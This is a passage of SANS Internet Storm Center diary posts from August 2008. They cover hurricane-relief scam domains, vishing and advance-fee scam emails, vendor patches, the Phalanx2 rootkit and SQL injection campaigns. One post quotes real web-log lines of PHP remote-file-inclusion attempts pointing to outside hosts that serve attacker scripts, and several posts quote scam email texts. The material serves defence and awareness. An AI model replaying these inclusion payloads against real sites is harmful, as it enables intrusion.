Diaries

Published: 2008-08-31

More Hurricane Domains

Yesterday we posted a list of new domains registered in anticipation of hurricane Gustav hitting the US gulf coast.  In the past 24 hours even more domains were registered.  Most of these sites are parked domains and many of them are for sale.  They will be worth monitoring, particularly if "donate here" messages appear.  Please make sure that your employees or customers verify any site that asks for donations to ensure that it is legitimate.  If you have any doubts, please visit the Better Business Bureau's web site.

Here are the domains we are aware of that were registered in the past 24 hours.  As with yesterday's list, we pulled this from the good people at Domain Tools.  You'll see a few hurricane Hanna sites showing up too.

boredatgustavus.net
contributegustav.org
contributiongustav.org
donategustav.org
donationgustav.org
gustav-hurricane.info
gustav-hurricane.net
gustav-hurricane.org
gustav-hurricane.us
gustav-relief.org
gustavassistance.org
gustavattorney.com
gustavcharities.com
gustavcharity.com
gustavclaims.net
gustavcontribution.org
gustavdonation.com
gustavfound.com
gustavhelpers.org
gustavhurricanerelief.com
gustavhurricanerelief.info
gustavhurricanerelief.net
gustavhurricanerelief.org
gustavlawsuit.com
gustavlawyer.com
gustavlegalrelief.com
gustavlegalrelief.info
gustavlouisiana.org
gustavmissing.com
gustavneworleans.com
gustavneworleans.org
gustavpictures.com
gustavrecovery.org
gustavrelief.info
gustavrelieffund.com
gustavrelieffund.org
gustavreliefvolunteers.com
gustavresponse.com
hannahrelief.org
hannainsuranceclaim.com
hannalawyer.com
hannarelief.org
helpgustavvictims.com
helpgustavvictims.net
helpgustavvictims.org
hurricanegustav08.com
hurricanegustave.info
hurricanegustavphotos.com
hurricanegustavrelief.info
hurricanegustavrelief.net
hurricanegustavrelief.org
hurricanegustavrepair.com
hurricanegustavresponse.info
hurricanegustavvictims.info
hurricanegustavvictims.org
hurricanehelp.us
hurricanelinks.info
hurricanelinks.org
hurricanerelo.com
hurricanerelo2ms.com
hurricanerelocate.com
hurricaneresponder.com
hurricaneseasonflorida.com
hurricanetrack.org
hurricanevolunteers.info
hurricanewatchnet.org
hurricanework.com
isurvivedhanna.com
lahurricanerelief.org
myhurricanephotos.com
netexashurricaneresponse.info
officialhurricanegustav2008.info
survivedgustav.com
survivedgustav.net

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-30

Help us Leap Ahead

Readers, we (the Internet Storm Center) were asked to help with a project to find a few game-changing ideas in cyber security. We've been asked to seek ideas from our global readership - that's you - for technology (or non-technical mechanisms which are made possible through technology) which can be deployed over the next decade to change the cyber game into one which the good guys can win.

Unlike many research agendas that aim for steady progress in the advancement of science, this project seeks just a few revolutionary ideas with the potential to reshape the landscape.  Also different is that the project targets a time horizon of about a decade from now for palpable impact, so along with the new concepts we must also describe the strategy that brings those ideas to fruition.  In other words, they are looking for ideas that can be developed quickly and will show results within the next ten years, but they also need a strategy for getting the idea into use.

Exploring the problem through a "game-changing" metaphor to stimulate new thinking, they are looking for ideas that change the rules of the game, change the stakes, or change the game board.  So we are looking for a couple of candidates for the big idea.  Do you have any ideas?  If so, send them to us via the contact form and we'll post them here for others to see and discuss.  Please keep your idea brief, don't worry about the details for now.  Just what is the technology (or non-technical mechanism made possible through technology) that you think might change the game?  However, do start thinking about how your idea would be carried out and what roadblocks might prevent it from being deployed.

Marcus H. Sachs
Director, SANS Internet Storm Center
 

0 Comments

Published: 2008-08-30

Here we go again - Hurricane Relief Sites

Remember three years ago when hurricanes Katrina and Rita hit the US Gulf coast?  On the day Katrina hit New Orleans hundreds of donation sites appeared online, many if not most were scam sites.  Well this time around it looks like the people who like to register domain names in anticipation of a storm's arrival have already started registering them for Gustav and Hanna.  I'm not suggeting that they are up to no good, but simply pointing out that the rush has started and we need to make sure our users are aware of the potential for scam sites appearing online in the next few days.

For example, these domains were registered in the past 24 hours according to Domain Tools:

aidforgustav.com
gustav-recovery.com
gustav08.com
gustavcharities.org
gustavcharity.org
gustavcontractor.com
gustavdonation.org
gustavdonations.com
gustavdonations.org
gustavfund.org
gustavjamaica.com
gustavsecurity.com
gustavsupport.com
gustavupdates.com
gustavvictims.com
gustavvolunteers.com
hurricanegustavrecovery.com
hurricanegustavresponse.com
isurvivedgustav.com
killergustav.com
officialhurricanegustav2008.com
reliefforgustav.com
trackgustav.com
trackgustav.net
victimsofgustav.com

I checked several of them and the sites i viewed are just parked with a "for sale" sign on them.  Nothing wrong with that, but it's only a matter of time before the "donate here" buttons start showing up.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-29

Scammers may use recorded snippets during voice phishing

The vishing (voice phishing) incident described in an earlier diary seemed to use a rudimentary voice synthesizer to request information from the caller. An ISC reader noted that in more sophisticated attacks, scammers employ "sampling"--recorded snippets of actual calls to sound more legitimate.

He submitted the following outline of the call he received the other day:

"XXX Bank values your business, please hold for next representative."

Hold music plays...

"Call being transferred to automated information system."

The above seemed to be recorded sound files from an actual call to the bank, as this is exactly what you would hear if you called the bank and chose to use their automated system.

"You have been selected to receive a special offer from XXX Bank. For a limited time you can receive 0% interest for 6 months on existing balances on your XXX Bank card. You can apply over the phone or online at www dot XXX Bank dot com. Press 1 to apply now."

You press 1 (or any number).

"To apply for the offer please enter your credit card now" (Computer generated voice)

You enter the card number.

"Please enter your PIN number now."

You enter the PIN.

"Thank you, processing account information now."  (Again, a recorded snippet from the real bank's voice system.)

"Your request has been processed and will appear on your next account statement, goodbye." (wav file sampled from banks real voice mail system.)

The ISC reader pointed out that this call highlights the following evolution in the scammers' tactics:

  • They had put effort into sampling real voice prompts from banks automated phone system.
  • They gave out the bank's real web address, presumably to give an air of legitimacy to the call. 

Thanks, ISC reader!

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-29

VMware releases updates - don't forget to patch

An ISC reader notified us that VMware released updates for for ACE, Server, Player and Workstation products:

According to VMware, the following 3 security issues are patched by the updates for VMware ACE, Player and Workstation:

  • Setting ActiveX killbit. "VMware has set the killbit on its ActiveX controls. Setting the killbit ensures that ActiveX controls cannot run in Internet Explorer (IE), and avoids security issues involving ActiveX controls in IE."
  • Update to FreeType. "FreeType 2.3.6 resolves an integer overflow vulnerability and other vulnerabilities that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted file."
  • Update to Cairo. "Cairo 1.4.12 resolves an integer overflow vulnerability that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted PNG file."

The following 4 security issues are patched by the updates for VMware Server:

  • Security Fix for VMware ISAPI Extension. "One of the ISAPI extensions provided by VMware is vulnerable to a remote denial of service. "
  • Security Fix for Local Privilege Escalation on Host System. "Exploitation of this vulnerability allows users to run arbitrary code on the host system with elevated privileges."
  • Update to Freetype. "FreeType 2.3.6 resolves an integer overflow vulnerability and other vulnerabilities that can allow malicious users to run arbitrary code or might cause a denial-of-service after reading a maliciously crafted file."
  • Setting ActiveX killbit. "VMware has set the killbit on its ActiveX controls. Setting the killbit ensures that ActiveX controls cannot run in Internet Explorer (IE), and avoids security issues involving ActiveX controls in IE."

Patching VMware is never a pleasant experience, and usually involves a heavy download and a lengthy installation, not to mention the testing to ensure your environment is not adversely affected by the patch. What's a better way to spend your weekend?

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-29

Scams from today's mailbag

Here are a few scam-related messages we received in the inbox today. A common thread is that the scammers keep thinking creatively about lowering the recepient's guard:

  • In the first example is a VoIP-based phishing (vishing) attack, where the scammer exploits people's tendency to trust the phone more than email.
  • In the next example, the scammer avoids asking for or promising money directly, so as not to arouse suspicions prematurely.
  • In the last example, the scammer acknowledges the dangers of scams, and claims to offer support to people who fell victim to them.

VoIP Phishing

Mike sent us a copy of a message that claimed to come from the City Credit Union, and asked the recipient to call a particular number because the recipient's account was temporarily suspended:

From: City Credit Union [mailto:do-not-reply@citycu.org]
Date: Friday, August 29, 2008
Subject: PLEASE CALL US! Account Temporary Suspended !

Dear Customer,

On August 28 14:28:34 EST 2008 you or someone changed your online password on City Credit Union website.

For security reasons, your account was temporary suspended.
If this request was not performed by you please log in and solve the problem.
To continue please call us at:

(214) 431-4XXX

We replace the last 3 digits with XXX, just in case. According to Mike, when you call, "you get a very old style computer voice asking you to input your debit credit card number." Mike is a customer of City Credit Union.

A very similar scam was reported by the Blog of Scams a few days ago--very similar text, but it referred to APL Federal Credit Union instead. For additional examples of vishing, see an earlier diary.

Baiting the Victim

In the next and unrelated example today's mailbag, we encounter a dying widow looking of an arms dealer, looking to make friends on the Internet:

From: Hilary Whitney [hilaryw.......@gmail....]
Date: Friday, August 29, 2008
Subject: Good day

Beside India House
Aldwvch London WC2B 4NA.
Email; mrsshilarywhitney@yahoo.co.uk

Good day

Am glad to have the opportunity to contact you  with the labtop the nurse brings for me. ...

I am married to late Mr Cosmos Whitney,a licensed arms dealer and a soldier before he died in the year 1998. ... Presently,my doctor told me that i would not last for the next 30 days due to a rare form of cancer of the pancress. ...

Presently,my doctor told me that i would not last for the next 30 days due to a rare form of cancer of the pancress. ... i hoped to find a good person whom i can find trust worthy to stand as a good friend  since i don't have any relatives,friends and children's as well.And also since i have limited time to live.

I want to know if your a honest and caring person,because am not used to internet friends.

Notice that the message implies that the sender is wealthy, and without anyone to receive inheritance when she passes away. This detail is meant to bait the recipient, who might hope to get the money after befriending Mrs. Hilary  Whitney. While this message was submitted via email, a version of it was also distributed via blog spam as early as May 23, 2008.

Scammers Against Scams

Our last example seems to be an outreach email for helping victims of Nigerian-style scams. In reality, it is an attempt to gain the recipients' trust to defraud them. The technique is similar to the example we described in an earlier diary.

From: "Brian Adams" <baantinigeriascams@gmail.com>
Date: Sat, 23 Aug 2008
Subject: Anti Nigeria Scams Ref: 23524326

Attention:

This email is not in any manner directed to you, but its purposely and specifically directed to Nigeria Scam victims. . However, if you have fallen for Nigerian Scams, do not hesitate to contact us or visit our website for more details on how we can help.

We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claims. Please read the full report at our website:
http://www.nigeria-scamvictims.itgo.com/

Yours faithfully,

Brian Adams
Nigerian Government Reimbursement Committee

Several instances of this scam were observed on the web recently (see 1, 2), and a Google search for "Nigerian Government Reimbursement Committee" shows numerous hits that suggest fraudulent activities.

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

 

0 Comments

Published: 2008-08-29

SWOT matrix for describing security posture

"Be brief, for no discourse can please when too long." Miguel de Cervantes
"When I try to be brief, I become obscure." Quintus Horatius Flaccus

How can you outline a system's security state succinctly, yet without omitting important points? Consider using the SWOT matrix to summarize your perspective. This approach is particularly effective when communicating with managers and executives, who are usually familiar with SWOT analysis.

The acronym SWOT, which stands for Strengths, Weaknesses, Opportunities and Threats, is designed to remind you of the key factors to consider when analyzing a situation. A SWOT matrix is a table that presents these elements in a compact manner. Take a look the SWOT matrix template below. (It is based on an image from Wikipedia.)

The left column lists helpful, positive factors; the right one lists harmful, negative factors. The top row includes the factors intrinsic to the analyzed system; the bottom one includes factors external to the system.

Let's examine contents of each cell in the SWOT matrix:SWOT Matrix

Strengths lists the most effective security aspects of the system, for example tight network access controls or comprehensive security policies. Improvements to the system's security can be accomplished by building upon these strengths.

Weaknesses outlines those aspects of the system that put it at risk, for instance poor input validation, or lack of effective log management. These aspects of the system should be improved.

Opportunities describes factors external to the system that can help improve its security. This might be the availability of security training funds for developers, or the existence of a logging system that has been purchased, but was never deployed. Items in this cell might be low-hanging-fruit--easy wins that can improve the system's security.

Threats highlights external factors that magnify the adverse effects of internal system weaknesses. For instance, the company may be subject to fine-imposing regulations, or may possess weak change management practices.

The SWOT matrix approach is particularly powerful when the company defines the objective with respect to which the system should be evaluated. In the context of information security, this usually involves agreeing on the system's risk profile, data sensitivity, business goals, and other factors that affect the system's security architecture.

If you like this approach, you are welcome to use the editable SWOT matrix template I created in Microsoft Word. You can download it from here.

Further information: For information about the classic use of SWOT analysis, take a look at the corresponding Wikipedia article. Security management topics such as SWOT analysis are explored in the SANS MGT-512 course. If you found this note useful, you may also enjoy my earlier tip on using an "elevator pitch" for explaining security risks to executives.

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-28

IE8 Beta 2 Released: InPrivate Browsing

Microsoft has put IE8 into its second beta and there are a variety of new features.  The one most interesting from a security perspective is "InPrivate" which let's users mort tightly control what cookies get stored (and how they are used) and the settings to control the browser history.  This is largely seen as a slap to Google and Yahoo where it will allow IE users a built-in way to limit the amount of profiling web advertising companies can do to target their advertisements.  It remains to be seen whether this will be used in an even handed way, but it is a good reminder to people how much data advertising companies such as Google can generate about its users.  Nothing in life is free, and if you aren't paying for those services, Google is getting paid from someone. :)

Some people could care less, others are more stringent about their privacy.  There are equivalents in the Firefox world (AdBlock, etc), but Microsoft seems to be trying to position themselves to be the protectors of privacy in the new web world order.  We'll see how that works out (because MSFT is an advertiser themselves with their own ad network).

--
John Bambenek
bambenek /at/ gmail \dot\ com

1 Comments

Published: 2008-08-28

When using fear to sell security can backfire

If you are a security professional, you need to possess strong persuasion skills. This doesn't apply solely to employees of security vendors. Even if your job is internally-focused, you still need to convince your colleagues to consider security when processing data, building systems, interacting with partners, etc. Since these individuals often do not report to you, have to exercise your persuasion abilities to achieve the desired results.

Highlighting the importance of security often incorporates an element of scare tactics: describing threats, explaining the repercussions of ignoring security, or providing examples where inadequate security led to disastrous consequences. The approach is used in both internal security awareness sessions, as well as security product literature.

Fear is a key element in the often vilified trio of fear, uncertainty, and doubt (FUD). Indeed, when used without restraint, fear can back-fire.

First, there's the boy who cried wolf syndrome. The infamous fable refers to a protagonist who issued so many false alarms about the wolf's impeding attack, that the villagers did not believe him when the calamity actually occurred. "The liar will lie once, twice, and then perish when he tells the truth." If resorting to fear, be sure to have your facts straight, and be ready to substantiate your claims if challenged.

Furthermore, while fear can be an effective element of persuasion, it can also paralyze the audience into inaction. This point is emphasized by the authors of Yes!: 50 Scientifically Proven Ways to Be Persuasive. They confirm that "fear-arousing communications usually stimulate the audience to take action to reduce the threat." With one exception:

"When the fear-producing message describes danger but the audience is not told of clear, specific, effective means of reducing the danger, they may deal with the fear by 'blocking out' the message or denying that it applies to them."

In your internal or outbound communications, be very clear about what steps the audience can take to reduce the risks you're describing. Otherwise, you scare tactics might back-fire, with the audience tuning out completely. (If you're interested in the chapter from the Yes! book that deals with fear and persuasion, you can read it here. The text references a 1965 study that tested the effectiveness of fear in the context of medical inoculation brochures, which is summarized here.)

-- Lenny

Lenny Zeltser leads a regional security consulting team at Savvis and teaches a course on reverse-engineering malware at SANS.

0 Comments

Published: 2008-08-26

Active attacks using stolen SSH keys (UPDATED)

The US-CERT is reporting that there is active attacks against Linux environments using stolen SSH keys.  There is a new rootkit out, Phalanx2 which is dropped by attackers which, among the usual rootkit tasks, steal any SSH key on a system.  The attackers then, presumably, use those stolen keys (the ones without passwords/passphrases at least) to get into other machines.

Sources of compromised keys could include the weak key vulnerability in Debian-based systems a few months ago, so if you haven't updated and replaced those keys, you ought to do so now.

The biggest defense is to have any keys, especially those used to authenticate to remote machines and certainly internet facing ones, require a passphrase to use.  Check your logs, especially if you use SSH key-based auth, to identify accesses from remote machines that have no business accessing you.  If you have IPs, that would be good.

To detect if you have Phalanx2, look for /etc/khubd.p2/ (access by cd, not ls) or any directory that is called "khubd.p2".  /dev/shm/ may contain files from the attack as well.  Tripwire, AIDE and friends should also be able to detect filesystem changes.

UPDATE:  A couple of quick updates.  Fellow Handler Bill Stearns mentioned several tools like this that can sniff out vulnerable keys.  Also, here is some more technical details on the phalanx2 rootkit.

--
John Bambenek
bambenek /at/ gmail \dot\ com

 

0 Comments

Published: 2008-08-26

Podcast Episode X Record Notice

Tomorrow night at 7:30 EDT (Eastern Daylight Savings Time) Johannes, John, and I will be recording Episode X of the Internet Storm Center Podcast.

We'll be broadcasting live at http://www.stickam.com/joelesler

Please come and join!  We love live feedback, talk with us in the stickam interface or via IRC in #dshield on irc.freenode.net.

Thanks!

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-25

The Latest in Crimeware

Brian Krebs over at the Washington Post has a series of stories up (dubbed Web Fraud 2.0) at the SecurityFix Blog on some of the developments of crimeware tools.  However, these tools operate on the opposite site of the fraud equation.  Namely, instead of malware that infects machines, its more the underground economy on what to do with that information and the facilitation of that activity.  It's a neat look at what "the other guys" are doing and how the electronic fraud market is an evolving and thriving one. 

--
John Bambenek
bambenek /at/ gmail \dot\ com

0 Comments

Published: 2008-08-25

Thoughts on the Best Western Compromise

The Sunday Herald reported on Sunday that Best Western was struck by a trojan attack that lead to the possible compromise of about 8 million victims. There is some debate as to the extent of the breach and not a small amount of rumor going around. I'm not entirely disposed to trust corporate press releases for the facts, nor am I going to blindly accept claims of security researchers who's first call is to the PR team when discovering a problem.

That said, here is what seems to be the agreed upon facts:

- A trojan was installed on one of the machines in Best Western's booking systems which lead to a compromise of credentials for the hotel's staff. These credentials were attempted to (and probably successfully) sold to organizations with links to the Russian mafia.

- Best Western is and was PCI DSS compliant.

Of course, PCI really only helps one piece of the security equation and compliance is not the same as security. In fact, it is usually (at best) a poor substitute and more often an excuse to stop thinking about security ("We're Compliant!" followed by self-congratulatory back slapping). The same is true with relying on encryption. Encryption can be "defeated" and the ways to do it are well-known. (For instance, here is a paper I wrote almost 4 years ago on how to do it). If you can own the endpoint of a communication, encryption is irrelevant.

As another example, remember the backup tape heists a few years ago? Attackers know it takes an excessive amount of time to crack encryption, so they target ways to avoid it. Someone had the great idea of stealing backup tapes at which point few people would have even thought to have protected those. Now it's due diligence.

That said, here are 5 areas that are likely targets in the near future (or are targets now) that you may be overlooking:

- Centralized patching systems (i.e. WSUS). If you can hijack an update server and have it distribute a malicious patch, you own every desktop in an environment. The RedHat compromise should be a wake-up call in this regard.

- Centralized configuration and management systems (i.e. Configuresoft or the like). Same as above... the machine that controls all your desktops becomes the single point of pwnership.

- Payroll. Your payroll system has salary information and identification information. In short, it has everything you need to commit tax fraud. In the US, in particular, it also has your national identification number (what is falsely called a "Social Security Number") which allows an attacker to basically jack your entire identity as well.

- Web 2.0. There have been some attempts to spread malware or spear phish using Web 2.0 technology. In as far as your organization uses Web 2.0, the more "legitimate" a message looks, the more likely a user is to click it. Web 2.0 provides a great vector to compromise an organization, especially if many of your employees use it. (Think social engineering).

- Malicious insiders. Ok, this last one is not new, but still a solid majority of attacks have at least some component of an insider attack. In some cases, simply installing a keylogger and "selling" the result is simple enough for a disgruntled employee with even a token level of access to an environment.

Will put up more info on Best Western as the situation warrants. Thoughts to the top 5 lists? What would you add or take off?

--
John Bambenek
bambenek /at/ gmail \dot\ com

1 Comments

Published: 2008-08-24

Warning, it's not from us.

I received an email today from a reader (thank you) who reported that they received a piece of spam today that came from the address: monitoring@isp.com.  (Notice the domain name.)  Now, we have seen this type of spam before, you know, perpetrating like it comes from your ISP while just having a malicious link in it, etc..

Except this time the spam was signed "ISC monitoring team"  (Notice the first three letters, and how they differ from the domain name).  So I am guessing that someone is trying to imitate us.  And while we recognize that imitation is the most sincerest form of flattery, this kind could be actually damaging. 

Rest assured our faithful readers, this is not from us.  First of all our email addresses are not "isp.com", nor "monitoring".  We don't sign our emails "ISC monitoring team".  Nor do we spell the word "Consortium" -- "Consorcium".  (misspelling from the email.)

So I'll give you a piece of advice that I gave my father this morning, if you don't know who the email came from, or the email doesn't pertain to you, try and do one of two things about it, mark it as spam (help train your spam filters) -- or delete it.  Obviously, this doesn't apply to everyone, but give it a shot and see where you get with it!

Thanks readers for staying on your toes!

 

-- Joel Esler http://www.joelesler.net

 

1 Comments

Published: 2008-08-23

SQL injections - an update

In an earlier story  we looked at an SQL injection that has infected close to 1.5 million sites.  The same search now only returns about 175K sites and many of those are discussing the injection.  The URLs I checked were all dead links, so well done everybody in cleaning up isle 3. 

With regards to the second set of SQL injections we talked about here  the number successful injections is still going up.  When I first came across these about 4.5k sites were injected,  now we are up to 33K.  Not a real success story for this particular attack.  The error with the 06014.html page is still not fixed.  The only variation I've seen so far is the target url which changes,  the rest is pretty much the same, the end game is still the stealing of WOW passwords.

People have reported that typically they get two hits from the one IP address and then it moves along. 

Keep an eye on your logs and consider implementing an IDS or use tools such as suhosin for PHP sites,  mod_security for apache, or any other url checking/sanitisation tool.

Mark - Shearwater

0 Comments

Published: 2008-08-22

RedHat compromise sparks a Critical openssh security update

Critical: openssh security update

"Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action". "In connection with the incident, the intruder was able to sign a small number of OpenSSH packages relating only to Red Hat Enterprise Linux 4  (i386 and x86_64 architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture only)".

"processes and efforts to date indicate that packages obtained by Red Hat Enterprise Linux subscribers via Red Hat Network are not at risk".

Affected Products: Red Hat Desktop (v. 4)
Red Hat Enterprise Linux (v. 5 server)
Red Hat Enterprise Linux AS (v. 4)
Red Hat Enterprise Linux AS (v. 4.5.z)
Red Hat Enterprise Linux Desktop (v. 5 client)
Red Hat Enterprise Linux ES (v. 4)
Red Hat Enterprise Linux ES (v. 4.5.z)
Red Hat Enterprise Linux WS (v. 4)

CVEs (cve.mitre.org): CVE-2007-4752

0 Comments

Published: 2008-08-22

RedHat - Fedora Servers Compromised

A RedHat list post acknowledges that last week "some Fedora servers were illegally accessed. The intrusion into the servers was quickly discovered, and the servers were taken offline.

Security specialists and administrators have been working since then to analyze the intrusion and the extent of the compromise as well as reinstall Fedora systems".

0 Comments

Published: 2008-08-22

MS08-051 V2.0 Patch issued August 20, 2008

"Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)

"Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update.

Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall".

Others should check with their patch management vendors.

The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates".

 

0 Comments

Published: 2008-08-20

From the mailbag, Opera 9.52...

From  their changelog "Opera 9.52 is a recommended security and stability upgrade."

Cheers,
Adrien de Beaupré
intru-shun.ca

0 Comments

Published: 2008-08-19

A morning stroll through my web logs

As I have done before, I would like to take you all on a quick stroll through some recent web-server logs from the ISC web server. This time around, lets look at some of the 404 errors.

We all know those 404 errors. Most of the time, they can be explained as typos, links to outdated URLs or other innocent mistakes. However, here some that are not quite as "obvious":

File does not exist: /home/live/isc/html/include
File does not exist: /home/live/isc/html/modules

Someone looking for a browsable directory listing of include files? I do see a lot of them lateley! No referer on any of them. An then we have this URL that is hit quite a few times:File does not exist: /home/live/isc/html/authentication

Some are quite odd and specific (only one hit to this one):

script '/home/live/isc/html/todofleetcontrol.php' not found or unable to stat

no, the ISC does not have a Fleet to control. But we are still looking for someone to donate a nice plane (with fuel!) to be used as "ISC1" (an A380 would be nice, but a Boing 747 will do)

Here a few more that are quite specific:

And of course, this wouldn't be complete with some attempts to exploit non-existing vulnerable PHP software:

"GET //includes/functions_portal.php?phpbb_root_path=http:// m4ng4.100webspace. net/id2.txt?? 
    HTTP/1.1" 404 5096 "-" "libwww-perl/5.810" "-"
GET //PhpLinkExchange/bits_listings.php?svr_rootP=http:// warsector. ru/access2006.log??? 
    HTTP/1.1" 404 5097 "-" "libwww-perl/5.79"
"GET /protection.php?action=logout&siteurl=http:// warsector. ru/access2006.log??? 
    HTTP/1.1" 404 5478 "-" "libwww-perl/5.65" "-"
"GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www. v8rx7forum.com/images/icons/header.txt???? 
    HTTP/1.1" 404 5078 "-" "libwww-perl/5.79" "-"
"GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www. kupc.org /zero/bbs//skin/zero_vote/ooid.txt???? 
    HTTP/1.1" 404 5102 "-" "libwww-perl/5.79" "-"
"GET /errors.php?error=http:// brnthug .awardspace.com/TT??? 
    HTTP/1.1" 404 5481 "-" "libwww-perl/5.811" "-"

As you can tell, none of these bother to even fake a user agent. Blocking libwww-perl is frequently done (e.g. via mod_rewrite), but in my case, there are some legit scripts that query the site. Got any cool and unique web logs? Send them in!

An while I am at it ;-). For all the PHP coders out there... I will offering the best PHP security class ever at NS2008 !

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-17

Not-So "Breaking News"

The spoofed CNN and MSNBC messages from last week have altered a bit, taking on a more generic approach.

The subject of the message is still: BREAKING NEWS.

Michael has been tracking these botnets for a while, his work is available here: http://www.vivtek.com/projects/despammed/stormspam.html.

Like the others, this first stage is a downloader, still readching out to 66.199.240.138 to get the rest of the goodies.  Unlike the previous waves, the first executable is named install.exe instead of adobe_flash.exe.  So there's a little something different to search for in your proxy logs.

-KL

 

3 Comments

Published: 2008-08-17

Volatility 1.3 Released

The folks over at volitilesystems.com have released version 1.3 of their Volatility Framework (https://www.volatilesystems.com/default/volatility) an open source collection of tools that allows an investigator to examine RAM dumps (crash dumps and hibernation files.)

-KL

0 Comments

Published: 2008-08-16

Another Infected Digital Photo Frame

Reader Greg sent us a note today about a new issue with digital photo frames.  Here is what he said:

Bought a couple of Vuescape 1.4" Digital Picture Frames from Inkstop, to give to family members for Christmas.  Just tried to install the software on my PC, and found that the setup.exe file was infected with AdClicker-DF.  It seems impossible to find an installer for the device online that does not have this infection.  I found another version of the program needed to work with the photo frame - PhotoViewer.exe - but it does not seem to recognize this device.

The mini-CD that came with the frames (item# 61000090) is labelled Driver and Utilities version 2.3B.  The Photoviewer software is, according to the properties sheet, published by Hojy Tech Corp.

This is a bit different from the digital photo frame infections we reported earlier this year.  In that previous case, the frames themselves contained malware.  In this new case the setup.exe file on the CD is infected with adware.

If you have seen this same phenomena in consumer products you've purchased recently (setup.exe containing malware) please let us know what the item was, what the malware was, and where you bought it.  By the way, many products come with extra programs that are often detected as spyware or adware.  We don't need to know about that, just cases of the setup or installer program itself being infected.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-16

nslookup Issue?

Two readers pointed us to a SecurityFocus item concerning Microsoft's nslookup.exe.  Details are at:

http://www.securityfocus.com/bid/30636/

A video showing a crash analysis of nslookup.exe is at

http://www.nullcode.com.ar/ncs/crash/nsloo.htm

If anybody has experienced an nslookup.exe crash or knows more about this vulnerability please let us know via our contact page.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-16

Thoughts on the Russia vs Georgia Cyber War

In the past week there has been a lot of media reporting on cyber attacks coming from Russia that are directed at Georgia.  Some examples are John Markoff's story in the New York Times, or Siobhan Gorman's story in the Wall Street Journal.  Others have been blogging about their experiences and many readers of our diaries have probably been called by local media outlets for comment.

Over the past years there have been a many of these "cyber wars" that infatuated the media.  Remember the Great Chinese-American cyber war of 2001 following the downing of a Chinese fighter plane and a US spy plane?  Also the Israeli-Palestinian cyber conflicts, the Indian-Pakistani sparing, Chinese-Taiwanese conflicts, and of course last year's episode with Estonia?

They seem to all follow a similar pattern:

  1. Some real-world event happens that focuses attention on a specific region
  2. The media goes looking for a new angle to report on and finds one in cyber space
  3. The online community, both sympathetic as well as curious, read the stories and get interested
  4. A "cyber war" starts
  5. The media has a field day

In the case of Georgia I think that a new pattern is emerging:

  1. Because of the large number of bots, botnets, and general level of criminal behavior on the Internet, a level of "background noise" is always present in every corner of cyberspace, including small countries like Georgia
  2. When the real-world event happens and the media starts looking for activity (steps one and two above) they immediately find it because of the "background noise" (this is like turning on the lights in the kitchen and seeing hundreds of cockroaches - you can acknowledge that you've got a roach problem and kill them or you can turn off the lights and PRESTO! they magically all go away, therefore no more roach problem)
  3. A story or two is published about a defaced website or the presence of botnets, or some other event that would normally occur because of the background noise, but it's tied to the developing real-world story
  4. The online community hears about the event and wants to go see for themselves, resulting in a massive denial of service attack against a small country that nobody ever visits but is now being overwhelmed by curious cyber tourists wanting to see what is going on
  5. The small country blames the DoS attack on their adversaries who of course deny wrong doing
  6. Citizens of the adversary country are also interested in seeing what is happening and so their IP addresses begin to show up in the logs, further lending credit to the growing theory that a cyber war is erupting from the larger and more aggressive country
  7. Citizens of other countries who want to "play" now jump into the frey and start launching real, no-kidding "attacks" against the small country just for kicks, but also to brag to their friends about how they are now Soldiers of Fortune in this brave new world
  8. Before you know it, the combination of media stories, tourists, vandals, criminals, and yes - there might even be a couple of "real" cyber warriors in all of this - all mix together in a torrent of hacking and wacking that reaches a cresendo before slowly tapering off into the history books
  9. Rinse and repeat

I realize that I'm being very cynical here, and that the future prospects of real, no-kidding, nation-state cyber warfare are very possible.  But folks, let's get real.  Is a botnet or a website defacement an act of war?  Is an overwhelming bunch of cyber tourists an act of war?  I think not.  But for the next few years I'm can predict with certainty that any time a physical-world invasion or conflict emerges that somebody will immediately go looking for the cyber angle.  And they will find one, and they will undoubtedly call it a cyber war.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-15

WebEx ActiveX buffer overflow

Last night, Cisco (who now owns WebEx) posted a bulletin about a buffer overflow in the WebEx Meeting Manager ActiveX control.  This one looks like it has the potential to be serious, so if you use WebEx, you are advised to read the Cisco advisory and update or set the killbit.

 

References:

http://www.cisco.com/warp/public/707/cisco-sa-20080814-webex.shtml

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2737 (not live yet)

0 Comments

Published: 2008-08-15

Another MS update that may have escaped notice

